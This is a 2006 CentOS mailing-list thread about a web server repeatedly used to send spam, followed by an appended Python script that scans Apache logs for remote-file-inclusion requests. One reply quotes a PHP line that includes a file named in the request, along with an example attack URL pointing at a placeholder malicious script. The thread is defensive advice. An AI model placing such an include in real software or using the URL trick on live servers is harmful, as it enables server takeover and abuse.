On Thursday 22 June 2006 13:16, Nicolas Ross wrote:
Hello, I have a server running CentOS 4.3 with all the latest updates. The server in question has been hacked by spammers a few times. The details of the hack have been basically the same every time. I find some directory created by the apache user account in /tmp. The new directory contains an html file, and a list of email addresses to spam and a perl script that spams all those email addresses with the html file.
My question is why is this happening? Obviously it's some apache exploit. I have removed mod_perl, that didn't help. I have now changed the permissions on the perl executable, that might help, we will see, but that doesn't address the core problem. How is it that someone can upload arbitrary files to my server and then execute an arbitrary command via apache?
Is this a known problem? Have others seen it? What can I do to help prevent this?
I've also been hacked a couple of times with this sort of exploit. In my case, it was an exploit in awstats, a weblog analyser. If you have it, I strongly suggest you get up to the latest version...
Also, if you have php scripts installed, they are a frequent source of security holes.
Nicolas
CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
All the hacks I've seen on my webservers were a combination of bad programming in php scripts and allow_url_fopen.
I've seen things like
else { include $_REQUEST["param"]; }
so one could simply modify a URL: http://example.com/bad-script.php?param=http://link.to.a.malicious.script/sc... From there you can put any local exploit code in script.php.
Disabling the allow_url_fopen will help you secure this a bit.
Just check your apache logs; you should be able to find interesting information in there.
I've seen this quite a few times. I hope this can help someone.
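
The log check suggested in the last reply, as an added example that is not part of the original thread: it flags requests in which a query-string value is itself a remote URL, the pattern that reply describes. The log lines are constructed samples, the Apache common/combined log format is assumed, and the function and variable names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumes Apache common/combined log format:
# host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# A parameter value that is itself a URL is what a remote include attempt looks like.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [22/Jun/2006:13:01:02 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120
198.51.100.7 - - [22/Jun/2006:13:02:10 -0400] "GET /bad-script.php?param=http://remote.example/sc.txt? HTTP/1.1" 200 312
198.51.100.7 - - [22/Jun/2006:13:02:15 -0400] "GET /bad-script.php?param=http%3A%2F%2Fremote.example%2Fsc.txt HTTP/1.1" 404 210
203.0.113.5 - - [22/Jun/2006:13:05:00 -0400] "GET /search.php?q=apache&ref=/docs/http HTTP/1.1" 200 900
""".splitlines()

def find_remote_include_requests(lines):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        host, when, method, target, status = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes once; decode again to catch double encoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)
            if REMOTE_RE.match(value):
                hits.append({"host": host, "time": when, "path": path,
                             "param": name, "value": value, "status": int(status)})
    return hits

if __name__ == "__main__":
    for h in find_remote_include_requests(SAMPLE_LOG):
        # A 200 means the script ran; review that script's source and /tmp next.
        print(h["time"], h["host"], h["path"], h["param"], h["value"], h["status"])
```

Only query strings appear in the access log, so parameters sent in a POST body are not covered by this check. Scripts that show up in the output are the ones to audit for an include on request input.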